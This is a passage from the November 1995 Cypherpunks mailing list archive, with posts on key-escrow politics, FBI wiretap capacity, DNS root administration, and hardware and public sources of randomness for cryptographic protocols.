benefits; it is not by definition an evil to be avoided. In any case regardless of the rhetoric government regulation increases, I prefer to press for some regulations I like rather than dream about there being none whatsoever. I do not separate the question of politics from technology. 
My reasons for working on the Web have from the start been explicitly political. I regard the pursuit of technology without consideration of the political consequences to be unethical. I am only in a position to influence the political process if I understand the position of the administration and can demonstrate an appreciation of their concerns. As Sun Tzu said "you must build a golden path along which your enemies may retreat". The problem with government is not that it is a conspiracy, it is an interlocking series of bureaucracies which all seek to avoid responsibility. If you want to get Phil Z. off the hook or foul up the government's escrow scheme plans you have to be prepared to step into their mindset and walk about on the inside a bit. Somewhere inside the government there is a jobsworth who is deciding to hassle Phil Z., this person will be a civil servant, not a political appointee. I.e., the dregs which get left behind each time there is a new administration. What we need to do is to identify that person and nail their ass to the wall. It has to become apparent to the administration that that individual has created an unnecessary source of embarrassment. It seems to me that the purpose of key escrow is not to allow the US govmt to spy on its citizens. I think they want to stop strong crypto getting out because there are still a large number of governments' cables they can break and they want the fun to continue a while. No external government is going to trust a system that is clearly subject to US govt. interference. If someone comes up with a crypto proposal to avoid paying taxes I know it will never get anywhere. If they come up with a crypto proposal that guarantees that a tax is paid but conceals the identity of the persons involved I get much more interested. 
If someone makes continuous political spiels themselves but objects when I make one they disagree with (as one person has done) I am not going to take their objection as indicating anything other than an inability to argue their case. Phill PS I'm also none too impressed by people who make comments like "you are wrong about XXX but I won't explain why". From cjl at welchlink.welch.jhu.edu Fri Nov 3 18:00:34 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Sat, 4 Nov 1995 10:00:34 +0800 Subject: Apologies for spam Message-ID: C-punx I really didn't mean to send that last message to the list. I had stiffened my resolve not to rise to the obvious troll bait, but a minor seizure of some sort resulted in the send command being issued instead of the cancel command. . . By way of making up for it I thought that some of you might be interested in knowing that AAAS is having its annual meeting in Baltimore this year and of interest to those pondering alternative means to bruting cryptosystems are the sessions below: DNA Computing, Friday Feb. 9, 8:30 - 11:30 am Organized by Richard Lipton, Princeton University Quantum Computation, Friday Feb. 9, 2:30 - 5:30 pm Organized by Seth Lloyd, MIT C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From nobody at REPLAY.COM Fri Nov 3 18:03:16 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 4 Nov 1995 10:03:16 +0800 Subject: Webernet Madne$$ Message-ID: <199511031826.TAA29048@utopia.hacktic.nl> Wall Street Journal, November 3, 1995 Wall Street is in the throes of Internet mania. Or is it Internet madness? Investors have poured into Internet-related stocks in the past couple of days, pushing some Web darlings such as Spyglass and Netscape Communications to dizzying new heights. 
"People are blindly investing in anything that says Internet," said William Bluestein, an analyst at Forrester Research in Cambridge, Mass. "Everyone wants to buy into the craze," says John Sebrich, who works with mutual-fund investor Mario Gabelli. ... What is the big stampede all about? During the past week or so, some of the highest-profile, highest-flying Internet stocks have actually reported profits, a development the Street wasn't expecting until next year at best. ... "The reason Intuit's moving up is the realization that if you had to do the banking industry over again, you wouldn't use brick and mortar," said Neal P. Miller, manager of Fidelity Investments' New Millennium Fund. "I think the size of this Internet thing is just dawning on everyone," he said. Neil Weintraut said, "Money managers are realizing that there is tremendous strength behind this. It's not just a technology chasing a marketplace." ... [and more gush]

Web and Wild [Chart]

Company               Yesterday's Close   Percent Change This Week
Spyglass              $70.50              +70%
Uunet Technologies     67.00              +41%
Netcom Online          68.63              +30%
Performance Systems    21.25              +30%
Intuit                 82.75              +21%
Netscape               98.25              +21%

----- European Firms Join Research Group In Bid to Guide Internet Development By Douglas Lavin Paris - - Afraid of being frozen out of the booming interest in the Internet, 20 European companies joined together to form the European arm of an Internet research group. The World Wide Web Consortium's European branch will work with the U.S. Web consortium on such global issues as electronic commerce, but it will also work on such international issues as the use of languages other than English on the Web, the multimedia portion of the Internet. 
"We must assure that the beautiful springtime of the World Wide Web is not also the autumn of the French language," said Elisabeth Dufourcq, France's secretary of state for research at a conference here to announce the creation of the European branch. Several large European technology firms, including Oy Nokia of Finland and Siemens AG of Germany, who are hoping to play a major role in the development of the Internet here ponied up $150,000 to join the consortium. Particularly well-represented are telephone companies who see the Internet as a threat to their ability to control national voice and data networks. Among the European members of the consortium, announced at a conference on the Web here, are British Telecommunications PLC and the national telecommunications companies of France, Germany, Italy and Belgium. All five companies either offer or are planning to offer Internet access. One of the group's key tasks is to ensure that improvements made by such rival companies as Netscape Communications Corp. and Microsoft Corp., both members of the U.S. consortium, don't create separate parts of the Internet that can only be read by Microsoft or Netscape software. Membership in the European consortium, which is to be based at the French national computer-research institute, Inria, also shows a remarkable degree of interest in the Web by the French business and government establishment, which only a year ago dismissed the Internet as an American version of France's Minitel network, but now is avidly promoting the Internet's growth. Among the members of the consortium from France are Assurances Generale de France, the insurance company; Electricite de France, the electricity company; Cie. des Machines Bull, the computer maker; Aerospatiale, the aerospace concern; and Thomson-CSF, the arms manufacturer, all of them state-controlled, as well as such private concerns as Alcatel-Alsthom SA and Groupe Michelin. 
Inria, which already has taken over some Web research work from CERN, the nuclear-research organization in Switzerland where the Web was created in 1989 by Tim Berners-Lee. Mr. Berners-Lee, now at the Massachusetts Institute of Technology, is heading both the U.S. and the European research consortia. [End] ----- Nuclear research > munitions research > controlled crypto > controlled commerce > economic espionage > ten thousand-year reign of the PGP-DigiBank-MIT-CERN crypto-commo-libertarian nerds. Phill, what's the admission code to W3 world domination? From futplex at pseudonym.com Fri Nov 3 18:08:55 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 4 Nov 1995 10:08:55 +0800 Subject: Many Topics are Appropriate for Discussion Here In-Reply-To: <199511031947.OAA00318@jekyll.piermont.com> Message-ID: <199511040030.TAA28181@opine.cs.umass.edu> Perry writes: > I don't care about quantity. Steve Bellovin is worth 500 subscribers > -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a > lot of this stuff than most of what passes for careful thought from > the average person here. I have some not-so-hypothetical questions: Suppose I have serious and plausibly realistic aspirations to become an authority in some subtopic of cryptography, network security, etc. (sometime well into the next millennium). Am I more likely to learn and hone my skills by actively participating (sticking my neck out) or merely lurking indefinitely? Regardless of the answer to the previous question, should the list suffer me my missteps and naivete? I do not consider these questions rhetorical, and the answers are very important to me on a personal level. And now I believe I'll shut up for a while. 
-Futplex From JMKELSEY at delphi.com Fri Nov 3 18:17:34 1995 From: JMKELSEY at delphi.com (JMKELSEY at delphi.com) Date: Sat, 4 Nov 1995 10:17:34 +0800 Subject: public random numbers Message-ID: <01HX7UTFXLK29BWWKZ@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Fri, 03 Nov 1995 00:44:02 -0800 >From: tcmay at got.net (Timothy C. May) >Subject: Re: video as a source of public randomness > >At 6:23 AM 11/3/95, JMKELSEY at delphi.com wrote: > >>This seems like a potential source of a stream of public random >>bits. If these can be authenticated and matched, this kind of thing >>can be useful in a lot of protocols. For example, if there is some > >I'm not sure what you mean by "public random bits"...I don't plan to share >my random bits with anyone, nor do I see any need for "public" random bits >(except for some well-known situations involving statistical testing, for >which certain PRNGs are actually preferable to "real" random numbers). Imagine there is a stream of totally random bits over which neither Alice nor Bob has any control. We can use this to make a lot of interactive protocols non-interactive. Suppose we have a protocol where we need a random challenge from Bob. Alice sends a message to Bob starting the protocol, stating that the public random bit stream is currently at bit i, and committing to use the n-bit string starting at position (i+t) as the challenge. The t parameter here needs to be large enough to ensure that Bob receives and logs the message before the public random bit stream outputs bit i+t. Alice proceeds with the protocol, using the n-bit string starting at bit (i+t) as the challenge. She sends the resulting message to Bob. No interaction was required of Bob--he merely had to log the times of the messages, and keep track of the public random bits. This could be really useful implementing noninteractive digital cash schemes, I think, because the merchant wouldn't have to send anything back. 
(The merchant can also be very hard to track down by following the messages, since these messages of Alice's can be encrypted under his public key and posted to a newsgroup or something, though this implies really large values of t.) Naturally, this only works if Alice and Bob get the same random string, and if it's not possible for anyone to alter the public random bit string either one receives. For large-scale applications, the way to do this is probably to put a hardware RNG into a communications satellite, and devote one channel to continuous digitally-signed packets of random data. For smaller-scale or underground applications, it might be sufficient to use some digitized transmission that would probably not be worth the trouble for an attacker to alter, even if one could. For example, if we used the entire digital video feed off some major satellite, it would be enormously expensive to take control of that for any length of time, to attack some protocol. To prevent simple attacks, we can hash the digitized input, and we can make each shared random packet dependent on previous packets by some relation like random_packet[i+1] = SHA1(random_packet[i],SHA1(digital_video_packet[i])). >And so there's no confusion, when I said "like a noisy channel (t.v. >channel, for example)" I meant a snowy, noisy picture such as one gets with >rabbit ears on top of the set, especially when the channel is an unused >one. It is unlikely in the extreme that any attacker could deduce the snowy >pixel values used in the distillation of entropy. I was just thinking of the unintended entropy in the stuff going on on the screen. Static would mess this idea up, though there are some ways to recover. >But back to the subject of "public random bits." Could you elaborate on >what you mean by this? (I assume you don't mean a one time pad that Alice >and Bob share, since that is really a separable issue from video as a >source of randomness. 
Only one of them will generate the pad, and will then >securely communicate it to the other.) No, of course not. Public random bits can be used in the derivation of a shared key, to prevent replay attacks in key-exchange protocols, but you certainly wouldn't want to use the public random bits directly as key material! >--Tim May Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list. --John Kelsey, jmkelsey at delphi.com PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCUAwUBMJqtkUHx57Ag8goBAQGWRgP1HES4nQiWRx0P31bi94g5MI8pSEwf5CZu 0RlWLyCl5CLB6PKu7bJDqiyHIBBJ90qqvJvZB740QHVxoRKycOD459nMWjiQXcnA 70Aq8gR+ZYCivsJLJfhKxoxuT+s/VyYVMB7mSfqGIGHHErbXHR4oA2T+Owmm8POi WDr4w3OjyQ== =3QHQ -----END PGP SIGNATURE----- From perry at piermont.com Fri Nov 3 18:26:40 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 4 Nov 1995 10:26:40 +0800 Subject: Sources of randomness In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com> Message-ID: <199511040044.TAA00751@jekyll.piermont.com> Peter Monta writes: > I'm puzzled by the implication that thermal noise or avalanche or Zener > noise is somehow inferior to noise from radioactive sources. It's not. I didn't contend that its inferior. I contended that its difficult to distinguish from sources of electronic interference and is easy to get wrong. > Take as an example Johnson noise, the voltage noise from a > resistance. It's the result of the interaction of vast numbers > of electrons. It is unpredictable in the same way that individual > radioactive decay events are unpredictable, and they are both > results of friendly quantum mechanics. However, its very easy to be sure that the event in a radiation detector was a radioactive decay event. It takes expertise to make sure that the noise you hear off a noisy circuit isn't just interference from other parts of the machine feeding back into the circuit. 
The reason I like radioactive sources is that they are simple and unambiguous in this way. Someone can gimmick a zener diode or get it "wrong" a lot more easily than they can get a radiation event wrong. Perry From nbrodbeck at hollandhart.com Fri Nov 3 18:35:04 1995 From: nbrodbeck at hollandhart.com (Noah Brodbeck) Date: Sat, 4 Nov 1995 10:35:04 +0800 Subject: Telephone switch capacity -Reply Message-ID: >>> John D. Ervin 11/03/95 05:32pm >You would be suprised as to how much is being tapped >now. >You need to do a little more research before spouting off.. >>If the FBI wishes to set up a system that is capable >>of monitoring 1% of the total number of lines, that equates >>to a ability to tap 5%, not 1% of all calls in progress. I am very confused. I was not 'spouting off' in any sense of the word. Your comment refers to my apparent lack of knowledge of the widespread practice of wiretapping. A practice, at least according to the sworn testimony of agents of the FBI, is not very widespread at all. That is, however, beside the point. I was making a very truthful comment about the engineered capacity of the telephone network in the U.S. I made no comment whatsoever about the current ability or desire of the FBI to tap into individuals' telephone conversations. -=- Noah From bdolan at use.usit.net Fri Nov 3 18:53:01 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Sat, 4 Nov 1995 10:53:01 +0800 Subject: consumer products that make nice sources Message-ID: >Date: Fri, 3 Nov 1995 10:34:00 -0500 (EST) >From: Brad Dolan >To: s1113645 at tesla.cc.uottawa.ca >Cc: "Perry E. Metzger" , cypherpunks at toad.com >Subject: Re: Sources of randomness > > >> What prices have you got listed? Is the equipment sensitive enough to get >> lots of entropy from a normal environment or do you need artificial sources >> of radioactivity? (easy, safe and cheap enough to get?) The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred. 
I think the following is the right phone number. Sunshine Mine is an amusing concept. People pay money to go breathe radon there, while others are spending much money avoiding radon. Anyway, the pillows make nice sources and good conversation pieces. bd >Safe, easy-to-obtain gamma sources: orange fiesta-ware pottery (at flea >markets), old-style Coleman lantern mantles (not sure about the new >ones), uranium-ore "health pillows" (Sunshine Mine, 408-225-3670). ^^^ 406 From tcmay at got.net Fri Nov 3 19:55:54 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 4 Nov 1995 11:55:54 +0800 Subject: consumer products that make nice sources Message-ID: At 5:46 PM 11/3/95, Brad Dolan wrote: >The tag on my Montana Sunshine Radon Mine radon pillow is a little blurred. >I think the following is the right phone number. > >Sunshine Mine is an amusing concept. People pay money to go breathe radon >there, while others are spending much money avoiding radon. > >Anyway, the pillows make nice sources and good conversation pieces. I'd say they make poor sources. Far too large. A smaller source has better access to the detector without adding much to the overall background the user is exposed to. (I'm not saying low-level uranium or thorium sources are much of a hazard, but the fluence presented at the detector is very low for such an extended source.) It depends on the detector type (alpha, beta, gamma, neutrino?), but high count rates can be obtained in a variety of ways. (Don't get too high a count rate, or the dead time characteristics of the pulse-height analyzers will introduce spurious correlations that decrease entropy--I mention this to show that even radiation detector sources of entropy have non-random issues to take into account.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From perry at piermont.com Fri Nov 3 19:57:10 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 4 Nov 1995 11:57:10 +0800 Subject: [political noise] Re: Crypto & Taxes In-Reply-To: Message-ID: <199511040228.VAA00856@jekyll.piermont.com> As much as I agree with you, this really doesn't belong in Cypherpunks. This REALLY isn't a list about libertarian politics. .pm s1113645 at tesla.cc.uottawa.ca writes: > > > On Fri, 3 Nov 1995 hallam at w3.org wrote: > > > Why unfortunately? I happen to consider that our modern social economy > > is a high point of civilisation. It is certainly a tremendous achievement. > > We can educate the entire population, provide them with health care, > > prevent famine and provide protection against crime and aggression by > > other states. All in all rather a good deal. > > That wonderful state of bliss seems rather limited in certain parts of > the world. > > Not that I want to get into a big political discussion, but David Friedman > has a nice, calm and rational book called The Machinery of Freedom, 2nd ed, > which argues anarchism/libertarianism from an economist's point of view. > The argument is not cased in terms of ethics and morals but rather > economic efficiency and utility. Slim, easy to read and cheap. He also > has a good sense of humor. Unfortunately the book is currently on back order. > I'm holding on to my library copy until they ship one to me. > > You can butt heads with him and Tim on the cyberia list (I don't remember > the address but they have it at news://nntp.hks.net ) > > I gather from the cyphernomicon that someone recently converted him to > cryptoanarchy.
> > > From futplex at pseudonym.com Fri Nov 3 20:03:34 1995 From: futplex at pseudonym.com (Futplex) Date: Sat, 4 Nov 1995 12:03:34 +0800 Subject: Kallstrom Calls All Calls Tappable In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com> Message-ID: <199511031743.MAA12656@opine.cs.umass.edu> James Kallstrom (FBI-NY) in The Washington Post: > "We've never done that many" taps at one time, he said. But > in a "worst-case scenario," such as a major act of > terrorism, the agency might need such ability, he said. "I > think it's a reasonable, minimal, conservative number." In other words, they'll "round up the usual suspects" ? Mr. Sose to a White Courtesy Telephone, please. The argument above is very different (and IMHO much less defensible for the FBI) than the claim that the LEAs will in general have more investigations in progress that require wiretapping. A gradual increase in wiretap orders in a given area could plausibly happen as more and more interesting traffic goes over the wire. But a sudden jump in activity after a crime has been committed looks like a big fishing expedition. In particular, I fear that judges will be more disposed to sign stacks of wiretap orders indiscriminately in the aftermath of a major act of violence. -Futplex From s1113645 at tesla.cc.uottawa.ca Fri Nov 3 20:05:01 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sat, 4 Nov 1995 12:05:01 +0800 Subject: Sources of randomness In-Reply-To: <199511032324.PAA22269@mage.qualcomm.com> Message-ID: On Fri, 3 Nov 1995, Peter Monta wrote: > I'm puzzled by the implication that thermal noise or avalanche or Zener > noise is somehow inferior to noise from radioactive sources. It's not. How much do the appropriate Zener diodes (it *is* diodes we're talking about, right?) cost? Are these things widely available? (sorry I really don't remember my electronics lessons) How would you get your first two sources? 
(the thermal and avalanche) From perry at piermont.com Fri Nov 3 20:09:50 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 4 Nov 1995 12:09:50 +0800 Subject: video as a source of public randomness In-Reply-To: Message-ID: <199511031747.MAA00192@jekyll.piermont.com> [I understand that this isn't your suggestion...] Timothy C. May writes: > I was commenting on the sources of randomness, such as atmospheric RF > variations, antenna configuration, tuner sensitivity, amplifier noise, > etc., that would make prediction of snow bits very difficult. I feel leery about these things if only because, as I've noted, trying to get these things "just right" and make sure that you are getting noise and not, say, high frequency hum from your own switching power supply, is very hard. You can set up a geiger counter if you are merely moderately competent. I don't know who I would trust to do analog stuff "just right". Do things a little wrong, and you merely have a huge search space and not an impossibly huge one -- the sort of toehold cryptanalysts want. > I have no brief with any of the proposed schemes: nearly any are better > than what we have now, if widely deployed and suitably used. Agreed. Perry From tcmay at got.net Fri Nov 3 20:10:04 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 4 Nov 1995 12:10:04 +0800 Subject: Bruce Schneier's Applied Cryptography, 2nd Edition Message-ID: At 2:48 PM 11/3/95, Ray Arachelian wrote: >Now does anyone want my old 1st edition? :-) I am interested. I will trade five (5) slightly used prime numbers for it. (Has anybody ever thought about using prime numbers as a medium of barter in a digital economy? Think of the labor that would be saved if we all didn't have to compute our own!! :-}) --Klaus! von Used Primes Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sjb at universe.digex.net Fri Nov 3 20:12:48 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Sat, 4 Nov 1995 12:12:48 +0800 Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux] In-Reply-To: <199511021747.JAA08919@orac.engr.sgi.com> Message-ID: <199511031805.NAA09698@universe.digex.net> Tom Weinstein writes: >In article , Mark Murray writes: >> I chatted with a colleague at work, and he helped bend my mind right. >> I had the mistaken notion that adding lots of data would "overflow" >> and "dilute" the entropy to an attackable state. > >I think the problem is not merely flooding the device with non-random >input data. If you coordinate sucking out entropy with feeding in >non-random data you can suck the real entropy in the system down to zero >while making the driver think it has plenty of randomness. While it's >not clear to me how this would lead to an attack, it would be worrisome. You need a similar "mind bending". "Feeding in non-random data" doesn't lead to the driver thinking it has "plenty of randomness" left, since it doesn't increase the entropy level to counteract the decrease from the entropy-sucker. The hard part would be having the driver figure out how much entropy it's getting from the input. "Non-random" implies some sort of correlation between the bits. I can't think of any way of measuring that which doesn't make some sort of "horizon" that a malicious user can confuse. The simple mechanism would be to assume that input from untrusted users adds no entropy, forcing entropy estimates to represent a lower bound. From perry at piermont.com Fri Nov 3 20:13:04 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Sat, 4 Nov 1995 12:13:04 +0800 Subject: Crypto & Taxes [WAS Re: Cybersecurity] In-Reply-To: <9511031621.AA11770@zorch.w3.org> Message-ID: <199511031659.LAA08943@jekyll.piermont.com> I strongly disagree with Mr. Hallam, but I am replying in private mail. This is far off the topic of the list. hallam at w3.org writes: > > >>Hold on. This is more "factoid" than "fact": recall that income is PAID > >>by people as well as EARNED by people. Most payers have easily > >>detectible physical presence and assets that can easily be attached by > >>regulators. It will be a cold day before, e.g., my employer agrees not > >>to report my earnings. And the same is true for most employers in most > >>industries. > > >Unfortunately, this is true, at least for people whose employers are > >subject to income tax somewhere. Taxing businesses doesn't make sense > >economically - you could collect almost as much money with far less disruption > >to the underlying economy by taxing it as wages for workers and > > Why unfortunately? I happen to consider that our modern social economy > is a high point of civilisation. It is certainly a tremendous achievement. > We can educate the entire population, provide them with health care, > prevent famine and provide protection against crime and aggression by > other states. All in all rather a good deal. > > While one might wish to personally avoid paying taxes there are no benefits if > everyone avoids paying taxes. There are significant areas of the economy > which can only be funded through social mandates, roads for example. > While there are fringe political elements who put forward alternative models > I find them no more convincing than the claims of the Marxists who made > similarly ideologically based assertions not so long ago. There have at > least been examples of Marxist states, even though they were not particularly > successful and rapidly degenerated into dictatorships.
> > > I find the libertopian obsession with government oppression and complete > indifference towards corporate exploitation unsatisfactory. The truth is > that both are inevitably interlinked. For the "libertarian" it is > unsatisfactory for the government to exploit consumers of utilities but > entirely satisfactory for corporations to do so should they have the chance. > The theoretical possibility of competition making this acceptable even > where there is no actual competition and hence no choice. This > corporativist model accepts suppression of freedom provided it is to > commercial goals. > > Consider the linkage between direct mail advertising and surveillance. It > is uneconomic for a government to trace the movements of every citizen. > The communist countries were brought down as much by the cost of the huge > surveillance administrations they constructed as anything else. In the > West we do not have government surveillance, we have direct mail marketers > do the job for government. Surveillance is made economic by getting the > citizen to subsidise it. It is naturally open for the government to apply > information collected by these people for their own purposes. It is a > salable commodity and the government is a willing buyer. Furthermore there > is a sophisticated infrastructure in place to achieve these ends. > > The extent of corporate surveillance goes unnoticed by most citizens. Few > people realise that when they use their credit card in a supermarket they > are supplying a direct mail marketing company with a profile of their > spending patterns. They are also providing a statement of where they are, > and indirectly their income, residence etc. > > What is needed is stringent data protection laws which enforce the > confidentiality of personal information. Note that both the SEPP and > STT payments systems conceal the credit card number from the merchant. > Cryptographic locks on individual parts of the picture are insufficient > however.
What is needed is laws which make the financing of the > underlying architecture uneconomic. > > Phill > > > From sharborth at hai-net.com Fri Nov 3 20:14:15 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Sat, 4 Nov 1995 12:14:15 +0800 Subject: FBI seeks huge wiretapping system Message-ID: <9510038154.AA815422767@houston_cc_smtp.hai-net.com> Subject: Re: FBI seeks huge wiretapping system Author: Jay Campbell at internet Date: 03-11-95 06:08 >I was being facetious. The point is that the government has no >inherent right to tap our phones -- indeed, it didn't do so for nearly >the first 200 years of our existence, and we did just fine -- better, >in fact. It is a well-known fact that it was common practice for NSA operatives to ^^^ masquerade as Injuns in the 1800's and waylay Pony Express riders in order ^^^^^^ I think you'll find the NSA was not in existence in the 1800's. to intercept communications between targeted parties. This practice lost popularity towards the end of the century with the advent of boxed cereal, and with it the Lone Ranger Decoder Ring, since the operatives were too underfunded to afford anything more than oatmeal. [ducks] -- Jay Campbell edge at got.net - Operations Manager -=-=-=-=-=-=- Sense Networking, Santa Cruz Node Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89 "On the Information Superhighway, I'm the guy behind you in this morning's traffic jam leaning on his horn." From s1113645 at tesla.cc.uottawa.ca Fri Nov 3 20:15:46 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sat, 4 Nov 1995 12:15:46 +0800 Subject: Sources of randomness In-Reply-To: <199511031427.JAA08758@jekyll.piermont.com> Message-ID: On Fri, 3 Nov 1995, Perry E. Metzger wrote: > I'll stick to recommending radioactive sources for now. Quantum > mechanics is your friend, and detectors from places like Aware are > cheap. What prices have you got listed?
Is the equipment sensitive enough to get lots of entropy from a normal environment or do you need artificial sources of radioactivity? (easy, safe and cheap enough to get?) Got any clues on random bits vs. time? Someone said this was discussed before, I caught the thread on the detector being listed but not any discussion of the product itself. Could anyone post an approx date so I could go look it up on the archive? Gracias. Interesting stuff. From pmonta at qualcomm.com Fri Nov 3 20:59:49 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Sat, 4 Nov 1995 12:59:49 +0800 Subject: Sources of randomness Message-ID: <199511032324.PAA22269@mage.qualcomm.com> I'm puzzled by the implication that thermal noise or avalanche or Zener noise is somehow inferior to noise from radioactive sources. It's not. Take as an example Johnson noise, the voltage noise from a resistance. It's the result of the interaction of vast numbers of electrons. It is unpredictable in the same way that individual radioactive decay events are unpredictable, and they are both results of friendly quantum mechanics. Small biases/interferences that come from nonideally sampling such voltages do not matter, since the entropy is still 1-epsilon bits per sample (more for nonbinary samples). There is no "chink in the armor" available for cryptanalysis---the user need only acquire N*(1+epsilon) random bits rather than N bits. The video-snow-noise described by Tim May is mostly Johnson noise in the low-noise-amplifier electronics, not atmospheric or ionospheric noise, at least above 50 MHz or so. Cheers, Peter Monta pmonta at qualcomm.com Qualcomm, Inc./Globalstar From shields at tembel.org Fri Nov 3 22:23:49 1995 From: shields at tembel.org (Michael Shields) Date: Sat, 4 Nov 1995 14:23:49 +0800 Subject: censored?
corrected [Steve Pizzo cited in The Spotlight] In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.> Message-ID: <47eti3$18q@yage.tembel.org> (Hopefully someone will correct me if any of this is wrong. But it would be nice if the thread ends.) Here's how it works, politically. IANA is the ultimate custodian of the namespace. IANA has delegated administrative control of the six traditional top-level domains (TLDs) to the InterNIC. The InterNIC is a building in my zipcode. It's in a mundane industrial park they share with PSI. It is operated by NSI, which is owned by SAIC, and funded by an NSF grant and the new domain charges. Here's how it works, technically. Your nameserver, if it doesn't know how to jump into the middle of the tree (via cached data, or the preconfigured servers for the local domain and the root), will start at the top of the tree and walk down. The root nameservers are run by volunteers. There are nine. One is at the InterNIC, but it need not be. The others are at ISI, PSI, UMD, NASA, UUNET (ISC), DDN, the Army Research Lab, and NORDUnet (in Sweden). (The most central point is actually Paul Vixie, maintainer of BIND, the software used for almost all nameservers, including the roots. UUNET funds BIND development.) If the InterNIC yanked your domain, this would *not* affect your IP connectivity -- your ability to be reached by any Internet protocol via IP address. The InterNIC has nothing at all to do with that. I'm much more worried about a lack of competency at NSI than I am about the FBI asking them to pull the plug on troublemakers, especially since it would be taken very seriously if you had a legitimate complaint about unjust termination (and some people, upset at having to pay for their domain(s), are looking for any reason to tear into the InterNIC's reputation). And *especially* since the evil government types could just call up Bell Atlantic, who they are already friendly with, and have them make my line unusable. 
That's what I'd do, were I an evil government type. And if anyone wanted to subvert your domain at a small fraction of the sites, DNS is easily spoofable.... So keep a sense of perspective. -- Shields. From tcmay at got.net Fri Nov 3 22:27:29 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 4 Nov 1995 14:27:29 +0800 Subject: Physician, Heal Thyself Message-ID: At 2:38 PM 11/3/95, Perry E. Metzger wrote: >Tim May will doubtless disagree, but he has nothing else to do in life ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >than read the net so his incentives to see traffic minimized aren't >the same as other people's. Perry, would you please knock off the drone of snide remarks about me? I mostly don't respond to your posts. You often make very good points, but at other times you demonstrate a shrillness and apparent lack of socialization that I find appalling. Your snide remarks are, to use your own rhetoric, "wasteful of bandwidth." They are also tacky, childish, and pointless. You are often quick to say "What has this got to do with Cypherpunks?," but you yourself are perfectly willing to rant on about Nietzsche, the East Germans, and Louis Freeh. Physician, heal thyself. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jbell at capecod.net Fri Nov 3 23:02:02 1995 From: jbell at capecod.net (John Curtis) Date: Sat, 4 Nov 1995 15:02:02 +0800 Subject: Many Topics are Appropriate for Discussion Here Message-ID: <01BAAA51.0BAA6820@hy34.capecod.net> Nothing ventured, nothing gained. 
I don't mind reading serious questions no matter how naive, provided that the questioner is willing to listen to the responses no matter how acerbic. You would have to have a pretty thick skin to post here frequently. ---------- From: Futplex[SMTP:futplex at pseudonym.com] Sent: Friday, November 03, 1995 2:30 PM To: Cypherpunks Mailing List Subject: Re: Many Topics are Appropriate for Discussion Here I have some not-so-hypothetical questions: Suppose I have serious and plausibly realistic aspirations to become an authority in some subtopic of cryptography, network security, etc. (sometime well into the next millennium). Am I more likely to learn and hone my skills by actively participating (sticking my neck out) or merely lurking indefinitely ? Regardless of the answer to the previous question, should the list suffer me my missteps and naivete ? I do not consider these questions rhetorical, and the answers are very important to me on a personal level. And now I believe I'll shut up for a while. -Futplex From die at pig.die.com Fri Nov 3 23:58:41 1995 From: die at pig.die.com (Dave Emery) Date: Sat, 4 Nov 1995 15:58:41 +0800 Subject: Real randomness generators In-Reply-To: <9511032132.AA00195@all.net> Message-ID: <9511032316.AA06015@pig.die.com> Dr. Fred writes: > As a side issue, you may find that once you start sending enough > information with truly random characteristics, you will be visited by > people that don't want you sending it. I know people who have > experienced these visitations and felt highly constrained as a result. Could you possibly elaborate on this ? Was this overseas where the NSA might be presumed to be involved or domestically ? (And of course was it in the USA or elsewhere ?)
